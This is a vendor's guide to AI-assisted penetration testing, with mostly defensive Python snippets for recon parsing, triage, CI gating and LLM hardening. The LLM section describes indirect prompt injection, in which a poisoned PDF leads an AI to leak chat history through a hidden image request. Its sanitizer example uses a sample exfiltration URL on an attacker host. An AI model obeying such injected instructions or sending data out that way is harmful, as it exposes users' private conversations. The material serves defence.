Generative AI Penetration Testing: Prompt Engineering for Pentesters


Why Generative AI Penetration Testing Is Changing Cybersecurity Forever

Generative AI penetration testing combines large language models and AI agents with traditional ethical hacking to automate vulnerability discovery, exploit generation, and reporting — faster and at greater scale than manual testing alone.

Quick answer — what you need to know:

- What it is: Using AI (like LLMs) to automate pentesting phases — recon, scanning, exploitation, and reporting

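- Key benefit: Organizations that make extensive use of security AI and automation see breach costs about $1.76 million lower on average (IBM, 2023), and teams report cutting remediation time by up to 60%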

- Where AI excels: Reconnaissance, payload generation, vulnerability analysis, and report writing

- Where humans still win: Business logic flaws, creative attack chains, and nuanced risk judgment

- The smart approach: A hybrid model — AI handles volume, humans handle complexity

Security teams are under pressure. Threats move fast. Manual testing is slow. And the gap between “tested” and “actually secure” keeps growing.

That’s where generative AI changes the game. Instead of running the same scripts on a quarterly schedule, AI agents can continuously simulate real attack paths, correlate signals across your entire attack surface, and surface critical issues before bad actors do.

But it’s not magic. AI is powerful — and it has real blind spots. Knowing when to trust it and when to hand off to a human is the skill that separates good security programs from great ones.

Think of it like a skilled intern who has read every security blog ever written — incredibly fast and pattern-savvy, but still needs a senior engineer’s judgment for the tricky stuff.

I’m Zezo Hafez, an AWS and Azure certified IT manager with over 15 years of experience in web development and cloud infrastructure — and generative AI penetration testing is one of the most important shifts I’ve seen in how we secure modern applications. In this guide, I’ll walk you through exactly how to put it to work.


What is Generative AI Penetration Testing?

At its core, generative AI penetration testing is the application of creative artificial intelligence—systems that can generate new content, code, and logic—to the discipline of ethical hacking. Unlike traditional “automated pentesting,” which often relies on static, deterministic scripts that follow a pre-set “if-this-then-that” logic, generative AI operates in a probabilistic space. It doesn’t just check for a known vulnerability; it reasons through the environment to find a path.

According to IBM’s 2023 Cost of a Data Breach Report, companies that extensively use AI and automation in their security workflows save an average of $1.76 million per breach compared to those that don’t. The field is also moving toward autonomous agents: AI entities that can execute multi-stage attack paths, simulating how a real-world adversary would pivot through a network.

While traditional tools are great at finding “low-hanging fruit,” they often fail to connect the dots. Generative AI excels at this “pathfinding,” using its understanding of code and network architecture to simulate complex breaches.
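Here is a minimal sketch of the classical attack-graph idea behind “pathfinding”. It assumes you have already turned individual findings into edges of the form “from this foothold, this weakness gets you there”. The graph, host names, and techniques are hypothetical. A breadth-first search is a deliberately simple stand-in for how AI agents reason, since real agents work over much messier evidence. The goal is the same in both cases: chain several individual findings into one breach path.

```python
from collections import deque

# Hypothetical attack graph: foothold -> list of (next foothold, weakness enabling the step).
ATTACK_GRAPH = {
    "internet": [("web-server", "SQL injection in login form")],
    "web-server": [("app-db", "reused database credentials in config file"),
                   ("jump-host", "SSH private key left in web root")],
    "jump-host": [("domain-controller", "unpatched privilege escalation")],
    "app-db": [],
    "domain-controller": [],
}


def shortest_attack_path(graph, start, goal):
    """Breadth-first search; returns [(from, to, weakness), ...] or None if unreachable."""
    queue = deque([start])
    came_from = {start: None}  # foothold -> (previous foothold, weakness used)
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for nxt, weakness in graph.get(node, []):
            if nxt not in came_from:
                came_from[nxt] = (node, weakness)
                queue.append(nxt)
    if goal not in came_from:
        return None
    # Walk backwards from the goal to rebuild the chain of steps.
    steps, node = [], goal
    while came_from[node] is not None:
        prev, weakness = came_from[node]
        steps.append((prev, node, weakness))
        node = prev
    return list(reversed(steps))


if __name__ == "__main__":
    for src, dst, how in shortest_attack_path(ATTACK_GRAPH, "internet", "domain-controller"):
        print(f"{src} -> {dst}: {how}")
```

Running it prints a three-step chain from the internet to the domain controller. A flat list of findings does not show that connection.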

| Feature | Traditional Manual Pentesting | AI-Driven Automated Testing |
|---|---|---|
| Speed | Weeks to months | Minutes to hours |
| Consistency | Highly dependent on tester skill | Standardized and repeatable |
| Scalability | Limited by human headcount | Virtually unlimited |
| Depth | Excellent for business logic | Improving, but needs human help |
| Cost | High per-engagement cost | Low per-scan (often free) |

Efficiency Gains in Generative AI Penetration Testing

The most immediate impact of generative AI penetration testing is pure efficiency. Gartner’s predictions suggest that over 75% of enterprise security teams will incorporate AI-driven automation into their workflows by 2026. This isn’t just about doing things faster; it’s about doing them more frequently.

We see teams reducing remediation time by up to 60% when using AI-enhanced vulnerability management. Because the AI can provide instant explanations and fix suggestions, developers don’t have to spend hours googling an obscure CVE. They get the “what,” the “why,” and the “how-to-fix” delivered in seconds. This scalability allows organizations to move from “point-in-time” testing to continuous security validation, which is essential in modern CI/CD environments.



Mastering the Pentesting Lifecycle with AI Agents

Integrating AI into your workflow isn’t about replacing the lifecycle; it’s about supercharging every phase of it. AI agents act as the “connective tissue” between different tools, taking the output of a scanner and using it as the input for an exploit attempt.
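Here is a small illustration of that hand-off. The sketch parses nmap’s XML output (the format it writes with `-oX`) using Python’s standard library. It then flattens the open services into short text lines that an AI agent or the next tool in the chain could consume. The sample XML is trimmed and hypothetical, and the one-line-per-service format is our own choice, not a standard.

```python
import xml.etree.ElementTree as ET

# Trimmed, hypothetical sample of the XML nmap writes with `-sV -oX scan.xml`.
SAMPLE_NMAP_XML = """<nmaprun>
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="nginx" version="1.18.0"/>
      </port>
      <port protocol="tcp" portid="3306">
        <state state="closed"/>
        <service name="mysql"/>
      </port>
    </ports>
  </host>
</nmaprun>"""


def open_services(nmap_xml):
    """Return one dict per open port with host, port, protocol, service, and version."""
    root = ET.fromstring(nmap_xml)
    results = []
    for host in root.findall("host"):
        addr = host.find("address").get("addr")  # first address element of the host
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # skip closed and filtered ports
            svc = port.find("service")
            name = svc.get("name", "unknown") if svc is not None else "unknown"
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            results.append({
                "host": addr,
                "port": int(port.get("portid")),
                "protocol": port.get("protocol"),
                "service": name,
                "version": f"{product} {version}".strip(),
            })
    return results


def to_context(services):
    """Render each open service as one compact line for the next prompt or tool."""
    return "\n".join(
        f"{s['host']}:{s['port']}/{s['protocol']} {s['service']} {s['version']}".rstrip()
        for s in services
    )


if __name__ == "__main__":
    print(to_context(open_services(SAMPLE_NMAP_XML)))
```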

From reconnaissance to maintaining access, AI helps pentesters think like an attacker at scale. Research from IEEE’s cybersecurity AI analysis highlights that automated code generation has improved to the point where AI can create unique, environment-specific payloads that are harder for traditional security controls to flag. For those focused on the web, check out our guide on web application penetration testing to see how these phases translate to the browser.

Intelligent Reconnaissance and OSINT

The first phase of any pentest is gathering information. Today, OSINT-driven breaches are surging, as attackers use public data to find weak points. Generative AI is a master of “Intelligent Reconnaissance.” It can:

- Surface Shadow IT: Identify forgotten subdomains or exposed cloud buckets that aren’t on your official asset list.

- Target Profiling: Analyze GitHub repositories, social media, and job postings to map out a company’s tech stack and employee hierarchy.

- Attack Surface Monitoring: Continuously watch for newly exposed services or leaked credentials.

By automating the correlation of thousands of data points, AI creates a “target profile” in minutes that would take a human researcher days to compile.
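Here is a minimal sketch of the correlation step behind shadow-IT discovery. It assumes each recon source (certificate transparency logs, DNS enumeration, code search, and so on) has already produced a list of hostnames. The source names and hosts are hypothetical. The code normalizes the names, compares them against the official asset inventory, and records which sources reported each unknown host, which can help with prioritization.

```python
def normalize(hostname):
    """Lower-case and drop a trailing dot so 'API.Example.com.' matches 'api.example.com'."""
    return hostname.strip().lower().rstrip(".")


def find_shadow_assets(discovered_by_source, inventory):
    """Map each hostname missing from the inventory to the set of sources that reported it."""
    known = {normalize(h) for h in inventory}
    unknown = {}
    for source, hosts in discovered_by_source.items():
        for host in hosts:
            name = normalize(host)
            if name not in known:
                unknown.setdefault(name, set()).add(source)
    return unknown


# Hypothetical recon output and inventory.
inventory = ["www.example.com", "api.example.com"]
discovered = {
    "ct_logs": ["WWW.example.com.", "staging.example.com"],
    "code_search": ["staging.example.com", "old-admin.example.com"],
}
for host, sources in sorted(find_shadow_assets(discovered, inventory).items()):
    print(host, sorted(sources))
```

Treat anything this returns as a lead, not a target. Confirm the asset is yours and in scope before testing it.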

Automated Vulnerability Analysis and Exploit Generation

Once the targets are identified, the AI moves into vulnerability analysis. This is where it gets creative. Instead of just identifying a potential SQL injection, generative AI can analyze the specific context of the application to generate custom payloads.

Forrester’s research on application security automation shows that this contextual analysis transforms overwhelming vulnerability reports into actionable roadmaps. For example, an AI might find a SQL injection, immediately recognize that it can be used to bypass a specific login form, and then generate payload variants tailored to that form. This is why choosing the right tools is critical; for more, see the ultimate guide to choosing an AI SAST analysis tool.

Overcoming Limitations: The Hybrid AI-Human Approach

As powerful as AI is, it isn’t perfect. It’s like that brilliant intern we mentioned—it knows the patterns but can miss the “big picture.” The most common failure point for AI is business logic flaws.

Think of a multi-step approval workflow in a banking app. An AI might find that all the technical code is secure, but a human tester might realize that by manipulating the application state, they can skip the “Manager Approval” step entirely. The NSA’s application security recommendations emphasize that while AI excels at technical vulnerabilities, human creativity is still required for complex attack chains.

Another hurdle is the “False Positive.” SANS Institute’s research on false positives indicates that without human oversight, security teams can become buried in “noise.” An AI might flag a vulnerability as critical, but a human knows that the affected system is an isolated, read-only dev environment with no sensitive data.
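You can encode that human judgment as a small rule set so it is applied consistently. The rules adjust a scanner’s or AI’s severity rating using asset context. The `AssetContext` fields and the one-step downgrades below are hypothetical rules for illustration. Context can only lower priority here, and the rules themselves should come from people who know the environment.

```python
from dataclasses import dataclass

SEVERITY_ORDER = ["info", "low", "medium", "high", "critical"]


@dataclass
class AssetContext:
    environment: str           # e.g. "prod", "staging", "dev"
    internet_facing: bool
    holds_sensitive_data: bool
    read_only: bool


def adjusted_severity(reported, ctx):
    """Downgrade (never upgrade) a reported severity using hypothetical context rules."""
    level = SEVERITY_ORDER.index(reported)
    if ctx.environment != "prod" and not ctx.internet_facing:
        level -= 1  # isolated, non-production system
    if ctx.read_only and not ctx.holds_sensitive_data:
        level -= 1  # little to steal and nothing to tamper with
    return SEVERITY_ORDER[max(level, 0)]


dev_box = AssetContext("dev", internet_facing=False, holds_sensitive_data=False, read_only=True)
prod_api = AssetContext("prod", internet_facing=True, holds_sensitive_data=True, read_only=False)
print(adjusted_severity("critical", dev_box), adjusted_severity("critical", prod_api))
```

Under these rules, a “critical” finding on an isolated, read-only dev box with no sensitive data drops to “medium”. The same finding on an internet-facing production system stays “critical”.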

Strategic Implementation of Generative AI Penetration Testing

To win, you need a hybrid strategy. We recommend a “Layered Security” approach:

- AI Foundation: Use AI for high-volume, low-risk tasks like continuous scanning, dependency analysis, and initial triage.

- Human Intelligence: Use expert pentesters to focus on creative exploitation, business logic, and high-stakes risk assessment.

- Hybrid Validation: Use AI to help humans write reports and explain findings to developers, while humans validate the AI’s “pathfinding” to ensure it’s not hallucinating.
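A cheap first-pass guard against hallucinated findings is to check every AI-reported issue against what your scanners actually observed. The sketch below assumes findings arrive as dicts with hypothetical `host`, `port`, and `claim` keys. Passing this check only shows the targeted service exists; it does not confirm the vulnerability. Supported findings still need human validation, and unsupported ones should be treated as likely hallucinations until proven otherwise.

```python
def split_by_evidence(ai_findings, observed_open):
    """Split AI-reported findings into those whose (host, port) a scanner actually saw open
    and those with no supporting scan evidence."""
    supported, unsupported = [], []
    for finding in ai_findings:
        key = (finding["host"], finding["port"])
        if key in observed_open:
            supported.append(finding)
        else:
            unsupported.append(finding)
    return supported, unsupported


# Hypothetical data: what the scanner saw vs. what the AI reported.
observed_open = {("10.0.0.5", 22), ("10.0.0.5", 80)}
ai_findings = [
    {"host": "10.0.0.5", "port": 80, "claim": "outdated nginx version"},
    {"host": "10.0.0.5", "port": 8443, "claim": "exposed admin console"},
]
supported, unsupported = split_by_evidence(ai_findings, observed_open)
print("needs proof:", [f["claim"] for f in unsupported])
```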

Integrating these workflows into your CI/CD pipelines ensures that security isn’t a bottleneck, but a feature of the development process.
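As one example of such an integration, here is a small gate script a CI job could run after an AI-assisted scan. It assumes the scan writes a JSON list of findings with hypothetical `severity`, `title`, and `human_reviewed` fields. The script exits non-zero, failing the pipeline step, while any high or critical finding is still waiting for human triage.

```python
import json
import sys

BLOCKING_SEVERITIES = {"high", "critical"}


def blocking_findings(findings):
    """High/critical findings that no human has triaged yet."""
    return [
        f for f in findings
        if f.get("severity") in BLOCKING_SEVERITIES and not f.get("human_reviewed", False)
    ]


def main(path):
    """Print blockers to stderr; return a non-zero exit code if there are any."""
    with open(path, encoding="utf-8") as fh:
        findings = json.load(fh)  # hypothetical format: a JSON list of finding objects
    blockers = blocking_findings(findings)
    for f in blockers:
        print(f"BLOCKING [{f['severity']}] {f.get('title', 'untitled')}", file=sys.stderr)
    return 1 if blockers else 0


if __name__ == "__main__" and len(sys.argv) > 1:
    sys.exit(main(sys.argv[1]))
```

In a pipeline, you would run something like `python ci_gate.py findings.json` as a step after the scan. Both file names are examples.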

Securing the AI Itself: Attacking LLM Architectures

As we use generative AI penetration testing to secure our apps, we also have to realize that the AI models themselves are now targets. If you’ve integrated an LLM into your product, you’ve opened a new attack surface.

The OWASP Top 10 for Large Language Model Applications identifies several unique risks:

- Prompt Injection: Tricking the AI into ignoring its safety instructions to reveal system secrets or execute unauthorized commands.

- Improper Output Handling: When an AI generates content (like a script) that the application then executes without sanitizing, leading to XSS or remote code execution.

- Excessive Agency: Giving an AI too much power—like the ability to delete database tables or send emails—without sufficient human-in-the-loop controls.
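For Excessive Agency, a common pattern is default-deny tool authorization: the application, not the model, decides which tool calls run. The sketch below uses hypothetical tool names. Read-only tools run freely, risky ones need a named human approver, and anything unknown is refused.

```python
# Hypothetical tool names; substitute the functions your LLM integration actually exposes.
READ_ONLY_TOOLS = {"search_docs", "get_ticket_status"}
APPROVAL_REQUIRED = {"send_email", "delete_record"}


class ToolCallDenied(Exception):
    """Raised when the model requests a tool call the application will not run."""


def authorize_tool_call(tool_name, approved_by=None):
    """Default-deny: allow read-only tools, require a named approver for risky ones."""
    if tool_name in READ_ONLY_TOOLS:
        return True
    if tool_name in APPROVAL_REQUIRED:
        if approved_by:
            return True
        raise ToolCallDenied(f"{tool_name} requires human approval")
    raise ToolCallDenied(f"{tool_name} is not on the allowlist")


# Simulated tool requests coming back from a model.
for request in ["search_docs", "send_email", "drop_table"]:
    try:
        authorize_tool_call(request)
        print(f"run {request}")
    except ToolCallDenied as err:
        print(f"blocked: {err}")
```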

To stay awake during your next audit, check out these 3 AI security audit tools that will not make you nap.

Mitigating Risks in Generative AI Applications

Securing an AI application requires a “Defense in Depth” mindset. You can’t just rely on the AI’s internal filters.

- Content Security Policy (CSP): Use strict CSPs to prevent data exfiltration. A common attack involves “Indirect Prompt Injection,” where an attacker hides a malicious instruction in a PDF that the AI reads, which then tricks the AI into sending your chat history to an external server via a hidden image request.

- Sandboxed Environments: Always execute AI-generated code or tool calls in isolated, ephemeral sandboxes.

- NIST AI Risk Management Framework (AI RMF): Use its Govern, Map, Measure, and Manage functions to address these non-deterministic risks throughout the AI lifecycle.
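You can blunt the hidden-image exfiltration trick on two layers. This sketch assumes your app renders model output as Markdown. It first replaces Markdown images that point at hosts outside an allowlist before rendering. It then adds a CSP whose `img-src` directive tells the browser to load images only from your own origin and one CDN. The host names are placeholders. The regex covers only Markdown image syntax, so raw HTML `<img>` tags in model output need their own handling.

```python
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}  # hypothetical allowlist

# Matches Markdown images: ![alt](url) or ![alt](url "title")
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*([^)\s]+)(?:\s+"[^"]*")?\s*\)')

# Browser-side backstop: images may load only from this origin and the allowlisted CDN.
CSP_HEADER = "default-src 'self'; img-src 'self' https://cdn.example.com"


def strip_untrusted_images(llm_output):
    """Replace images on non-allowlisted hosts with their alt text, so rendering the output
    never triggers a request whose URL could carry exfiltrated data."""
    def replace(match):
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""  # relative URLs have no host and are removed too
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)
        return f"[image removed: {alt}]"
    return MD_IMAGE.sub(replace, llm_output)


print(strip_untrusted_images("Summary ![x](https://attacker.example/p?d=chat-history)"))
```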

Emerging Trends and the Future of AI Pentesting

The future of generative AI penetration testing is arriving quickly. One major trend is the integration of quantum-resistant cryptography. Because quantum computing threatens to break today’s public-key encryption, AI systems are being tested to ensure they can handle lattice-based and other post-quantum protocols.

We are also seeing the rise of blockchain-enhanced logging. By using a decentralized ledger (like Hyperledger Fabric) to log pentesting activities, organizations can create a tamper-evident audit trail. Reported results include 90% vulnerability-resolution efficiency. The gain is attributed to everyone (devs, security, and auditors) looking at the same immutable “source of truth.”
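The property doing the work in a ledger-backed audit trail is hash chaining. Each entry’s hash covers the previous entry’s hash, so altering one entry changes every hash after it. The sketch below shows only that core idea using Python’s `hashlib`. It is not Hyperledger Fabric, and on its own it is tamper-evident rather than tamper-proof. A distributed ledger adds replication and consensus so that no single party can quietly rewrite the whole chain.

```python
import hashlib
import json

GENESIS = "0" * 64  # placeholder "previous hash" for the first entry


def _entry_hash(event, prev_hash):
    payload = json.dumps({"event": event, "prev": prev_hash}, sort_keys=True)
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()


def append_entry(log, event):
    """Append an event whose hash covers both the event and the previous entry's hash."""
    prev_hash = log[-1]["hash"] if log else GENESIS
    entry = {"event": event, "prev": prev_hash, "hash": _entry_hash(event, prev_hash)}
    log.append(entry)
    return entry


def verify(log):
    """Recompute the chain. Edited, reordered, or mid-log deleted entries fail;
    silently dropping the newest entries needs an external anchor to detect."""
    prev_hash = GENESIS
    for entry in log:
        if entry["prev"] != prev_hash or entry["hash"] != _entry_hash(entry["event"], prev_hash):
            return False
        prev_hash = entry["hash"]
    return True


log = []
append_entry(log, {"action": "scan", "target": "10.0.0.5"})
append_entry(log, {"action": "report", "target": "10.0.0.5"})
print(verify(log))
```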

Finally, NIST’s proactive security guidelines are pushing us toward “Autonomous Red Teaming,” where AI agents don’t just find bugs but proactively hunt for weaknesses 24/7. For a peek at what’s coming next, see our list of the best AI penetration testing tools for 2026.

Frequently Asked Questions about AI Pentesting

What is the ROI of using AI in penetration testing?

The ROI can be substantial. Beyond the $1.76 million average savings per breach, teams report up to a 60% reduction in remediation time. By automating the “boring” parts of security, like writing reports and triaging duplicates, you free your high-priced security talent to focus on the 10% of vulnerabilities that actually cause 90% of the risk.
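To sanity-check ROI for your own team, the usual formula is ROI = (benefit - cost) / cost. The sketch below treats benefit as two parts added together. The first is analyst time freed up. The second is the expected breach cost avoided, calculated as annual breach probability times the cost difference. Every input in the example is hypothetical. Applying IBM’s $1.76 million average to a specific organization is itself an assumption.

```python
def annual_benefit(hours_saved, hourly_rate, breach_probability, breach_cost_difference):
    """Analyst time freed up plus the probability-weighted breach cost avoided."""
    return hours_saved * hourly_rate + breach_probability * breach_cost_difference


def roi(benefit, cost):
    """Classic return on investment: (benefit - cost) / cost."""
    return (benefit - cost) / cost


# Hypothetical inputs for illustration only.
benefit = annual_benefit(hours_saved=500, hourly_rate=100,
                         breach_probability=0.05, breach_cost_difference=1_760_000)
print(f"benefit = ${benefit:,.0f}, ROI = {roi(benefit, 60_000):.0%}")
```

Suppose you save 500 hours at $100/hour, face a 5% annual breach probability, use the $1.76 million average difference, and spend $60,000 a year on tooling. The benefit comes to $138,000 and the ROI to 1.3, or 130%.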

How do I get started with AI-powered pentesting?

Start small. Use a tool like PentestGPT to help guide your manual tests, or integrate an AI-powered scanner into your dev workflow. Focus on “Prompt Engineering”—learning how to give an AI the right context (like your tech stack and network map) so it can give you better results. You don’t need to be a data scientist; you just need to be a curious hacker.
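Here is a minimal sketch of a reusable prompt template that gives the AI the right context, built with Python’s `string.Template`. The section headings and wording are our own assumptions, not a format any specific tool requires. The code only builds the text; sending it to PentestGPT or any other model is left to your tool of choice. Stating the authorized scope explicitly and asking the model to flag missing information tend to keep answers grounded.

```python
from string import Template

# Hypothetical template; adjust the sections to your engagement.
PENTEST_PROMPT = Template("""You are assisting an authorized penetration test.
In-scope targets (nothing else is in scope): $scope
Tech stack: $stack
Observed services:
$services
Task: $task
For each idea, give: the weakness to check, a safe way to verify it, and the evidence that would confirm it.
If information is missing, say what is missing instead of guessing.""")


def build_prompt(scope, stack, services, task):
    """Fill the template from plain Python lists and a task description."""
    return PENTEST_PROMPT.substitute(
        scope=", ".join(scope),
        stack=", ".join(stack),
        services="\n".join(f"- {s}" for s in services),
        task=task,
    )


print(build_prompt(
    scope=["10.0.0.0/24"],
    stack=["nginx 1.18", "Django 4.2", "PostgreSQL"],
    services=["10.0.0.5:80/tcp http nginx 1.18.0", "10.0.0.5:22/tcp ssh OpenSSH 8.9p1"],
    task="Suggest the next three manual checks for the web tier.",
))
```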

What are the ethical risks of AI social engineering?

This is a major concern. Research published by Harvard Business Review found that 60% of people fell for AI-automated phishing attacks, a rate comparable to phishing messages crafted by human experts. When running simulations, obtain explicit consent, set clear “Rules of Engagement,” and focus on education rather than “tricking” employees. Always follow responsible disclosure practices.
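Consent and rules of engagement are easier to enforce when code checks them before any simulated phish goes out. This sketch assumes two hypothetical inputs: the signed rules of engagement list the consenting email domains, and HR supplies an exclusion list in lower case. Every address is normalized, and anything outside those bounds is dropped.

```python
def eligible_recipients(candidates, consented_domains, excluded):
    """Keep only addresses on consenting domains that are not on the exclusion list.
    `excluded` is assumed to hold lower-case addresses."""
    eligible = []
    for address in candidates:
        addr = address.strip().lower()
        local, _, domain = addr.rpartition("@")
        if not local or domain not in consented_domains:
            continue  # malformed address or domain not covered by the signed RoE
        if addr in excluded:
            continue  # person opted out or was excluded by HR
        eligible.append(addr)
    return eligible


print(eligible_recipients(
    ["Alice@Corp.example", "bob@partner.example", "carol@corp.example", "not-an-email"],
    consented_domains={"corp.example"},
    excluded={"carol@corp.example"},
))
```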

Conclusion

At Aman Security, we believe that the future of safety lies in the perfect partnership between human ingenuity and machine scale. Generative AI penetration testing isn’t just a new tool in the belt; it’s a fundamental shift in how we defend the digital world.

By embracing an adaptive defense—one that uses AI to predict vulnerabilities before they are even coded—we can finally move faster than the attackers. Whether you’re looking for blazing-fast scans or pro-level reports with instant AI explanations, we’re here to help you navigate this new frontier.

Ready to see what AI can find in your infrastructure? Get started with Aman Security today and begin your journey toward a more autonomous, resilient future.

Secure Your Apps with Aman

Put these mitigation steps into practice. Get professional-grade vulnerability detection in one place.
